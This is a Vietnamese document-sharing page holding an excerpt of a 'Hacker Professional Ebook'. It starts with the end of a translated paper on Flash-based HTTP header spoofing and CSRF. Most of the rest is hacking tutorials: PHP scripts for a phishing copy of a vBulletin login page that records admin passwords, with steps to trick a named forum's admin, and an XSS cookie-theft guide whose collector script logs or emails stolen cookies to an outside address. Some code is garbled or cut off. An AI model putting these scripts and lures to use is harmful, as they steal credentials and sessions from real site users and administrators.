1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 203 pps

6 67 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 187,13 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Cần phải nghiên cứu xa hơn để nắm rõ những cách thực hiện như vậy có đưa đến khả năng khai thác lỗi hay không Các kinh nghiệm đã cho phép Flash 9 giới hạn nhiều hơn những header sẽ dùng

Trang 1

Hướng dẫn thêm

================

HTTP Request Splitting ([8]) và HTTP Request Smuggling ([10]) trong IE với Flash 7/8 có thể gữi header Content-Length với bất kì giá trị nào Điều này cho phép thực hiện tấn công HTTP Request Splitting Cũng như thế, việc chèn header Transfer-Encoding, hay thêm một header Content-Length thứ hai sẽ mơ ra cơ hội cho HTTP Request Smuggling Cần phải nghiên cứu xa hơn để nắm rõ những cách thực hiện như vậy có đưa đến khả năng khai thác lỗi hay không

Các kinh nghiệm đã cho phép Flash 9 giới hạn nhiều hơn những header sẽ dùng trong LoadVars.addRequestHeader(), ngôn ngữ ActionScript 3.0 sẽ mạnh hơn là 2.0 Như thế, phiên bản mới này cung cấp những tính năng đáng giá tại mức

HTTP, như là khả năng gửi nhiều loại HTTP, không chĩ GET và POST Tốt hơn nên tìm hiểu Flash 9 và ActionScript 3.0 để nắm rõ những tiềm năng của chúng, lưu ý về các mẹo trong HTTP request

Kết luận

-==========

Việc xác thực dựa trên các header của HTTP request mà trình duyệt gửi đi không phải là ý hay Thực tế thì mọi header có thể bị giả nếu client đang phải chạy một Flash movie xấu, và điều này hoàn toàn đúng với trên 80% máy tính để bàn truy cập Internet Do đó, khả năng tấn công cross-site scripting trên những header như trên, cũng như tấn công bằng các request giả để cross site (cho những site mà tự bảo vệ bằng cách kiểm tra header Referer) là cao hơn so với những gì người ta nhận thấy

Bài viết khuyên nên dùng giải pháp đơn phần cho trường hợp về sau, tuy nhiên giải pháp này phụ thuộc rất nhiều vào Flash, và như thế có thể không cung cấp phần bảo vệ chống đỡ những biến thái được sử dụng với các công nghệ khác, hoặc

những phát triển khác trong Flash Vì thế, với giả mạo request cross site, nên xem xét những giải pháp khác mà không dựa vào Referer

Tham khảo

-=========

[1] "Technology Breakdown" (Adobe website)

Trang 2

http://www.adobe.com/products/player_census/flashplayer/tech_breakdown.html

[2] "Macromedia Flash Player Version Penetration" (Adobe website)

http://www.adobe.com/products/player_census/flashplayer/version_penetration.ht

ml

[3] "Re: 'Exploiting the XmlHttpRequest object in IE' - paper by Amit

Klein" by Anonymous, BugTraq posting, September 27th, 2005

http://www.securityfocus.com/archive/1/411823

[4] "Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1" by Thiago

Zaninotti, BugTraq posting, May 8th, 2006

http://www.securityfocus.com/archive/1/433280

[5] "Re: Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1" by

Amit Klein, BugTraq posting, May 18th, 2006

http://www.securityfocus.com/archive/1/434729

[6] "Client Side Trojans", Zope developers mailing list, May 2000

http://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojan

[7] "Cross Site Request Forgeries" by Peter Watkins, BugTraq posting, June 15th, 2001

http://www.tux.org/~peterw/csrf.txt

[8] "Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a

lot more " by Amit Klein, BugTraq posting,

September 24th, 2005

http://www.securityfocus.com/archive/1/411585

[9] "Adobe Flash Player 9 Leads a New Generation of Dynamic Media and Rich Internet Applications" (Adobe website), June 28th, 2006

http://www.adobe.com/aboutadobe/pressroom/pressreleases/200606/062806Flash9 html

[10] "HTTP Request Smuggling" by Chaim Linhart, Amit Klein, Ronen Heled and Steve Orrin, June 6th, 2005

http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf

Trang 3

Người dịch: hakuso - Nhóm dịch thuật HVA

Lấy pass admin VBB.Đôi điều cần bàn

Tìm hiểu theo bài viết "Video hacking yahoo"

Trong bài viết video hacking yahoo,có bạn đã rất tài tình (Mà cũng không biết của thằng nèo nữa ) để lấy được username và password của victim thông qua đoạn code sau :

Trích:

<?

$f=fopen("xxxx.html","a");

fwrite($f,"$login@yahoo.com : $passwd\n=====================\n");

fclose($f);

header("location: http://login.yahoo.com/config/login? o=& intltype

=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMs

gr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=");

?>

Trong đó chú ý đến :

login :lưu tên đăng nhập

passwd:mật khẩu

sau khi đăng nhập victim sẽ được chuyển tới site security login của yahoo để

không nghi ngờ về việc đăng nhập của mình đã được lưu lại

Trích:

location: http://login.yahoo.com/config/login? o=& intltype

=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMs

gr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=

Từ đó sao chúng ta không xài đến cách lấy pass của admin bằng cách này

Cũng tương tự chúng ta đến trang login của victim để save lại nó:

Chẳng hạn thế này:

http://tuoitreonline.info/forum/newt =newthread&f=2

(chưa đăng nhập)

Nhớ thêm các file trong background cho chuẩn vởi site đó.Up toàn bộ lên hostban

và thay cai html của nó thành dạng như newthread.php2.htm cho giồng 2 bài viết Trong file html của cái này nhở thay :

http://www.tuoitreonline.info/forum/login.php

bằng http://hostban.com/forum/login.php

file login.php của bạn sẽ là`:

Trích:

Trang 4

<?

$f=fopen("xxxx.html","a");

fwrite($f,"$vb_login_username : $vb_login_password\n===========\n");

fclose($f);

header("location:

http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554");

?>

Bạn thấy đó chính "vb_login_username" và "vb_login_password" là code lưu lại pass dùng cho login Vbb(mọi phiên bản )

và "xxxx.html" là file trống dùng để lưu lại username và pass

Chu ý rằng :

Trích:

http://www.tuoitreonline.info/forum/ 554#post152554

Đó chính là cái site ma` mình đánh lừa cái thằng admin của trang này

Sau khi reg nick gủi cho admin (dạng tin nhắn ) đoạn sau:

Trích:

http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554Admi

n cho hỏi

Chẳng hiểu thể nào mà cai Quote này nó đọc cả code chep cái này tại đây nhé http://ttvnn.info/forum/lua.html

Với "http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554" la` cái đã lưu ý ở trên còn "http://hostban.com/forum/newthread.php2.htm" là trang

mà bạn lưu site login của nó

Cách dùng [URL= này khả thi hơn cái code "<a href= vò có nhiều site vbb không cho phép html và vBulletin khuyến cáo không nên cho phép html

Thế nhé

Vn_inter(vniss)

Hướng dẫn lấy cookies của phpBB (new bug XSS)

Dạo này HVA đang lên, anh em vnISS có vẻ trầm quá , làm 1 tut chơi

Hướng dẫn lấy cookie của PHPBB

Yêu cầu :

Không đánh cắp bản quyền bài viết

Bài viết mang tính tham khảo và bảo mật, tác giả không chịu mọi trách nhiệm về mặt phá hoại của bài viết này

1 trình browser (e.g : FireFox)

Trang 5

1 hosting hỗ trợ PHP

Live http headers (chi tiết tại http://livehttpheaders.mozdev.org ) có thể hiểu nôm

na là công cụ giúp ta nhanh chóng fake cookies

Bước 1 :

Sử dụng đoạn code sau

PHP Code:

<?php

$a = $_GET['helpme'];

$ip = getenv ('REMOTE_ADDR');

$date=date("j F, Y, g:i a");

$referer=getenv ('HTTP_REFERER');

$fp = fopen('giupemvoi.txt', 'a');

fwrite($fp,

'Cookie: '.$a.'

Dia chi : ' $ip '

fclose($fp);

?>

<HTML>

<TITLE>Lam sao day anh, giup em </TITLE>

<BODY>

<img scr="link file ảnh để fake admin tập 2">he</img>

</BODY>

</HTML>

Save nó lại thành file giupemdianh.php

creat 1 file giupemvoi.txt chmod về 777

hoặc nếu you muốn send về mail có thể làm như sau :

PHP Code:

<?php

$a = $_GET['helpme'];

$ip = getenv ('REMOTE_ADDR');

$date=date("j F, Y, g:i a");

$referer=getenv ('HTTP_REFERER');

mail('dinhcaohack@yahoo.com','XSS in phpBB', $a.' '.$ip.' '.$date.' '.$referer.' ','sit

?>

<HTML>

Trang 6

<TITLE>Lam sao day anh, giup em </TITLE>

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN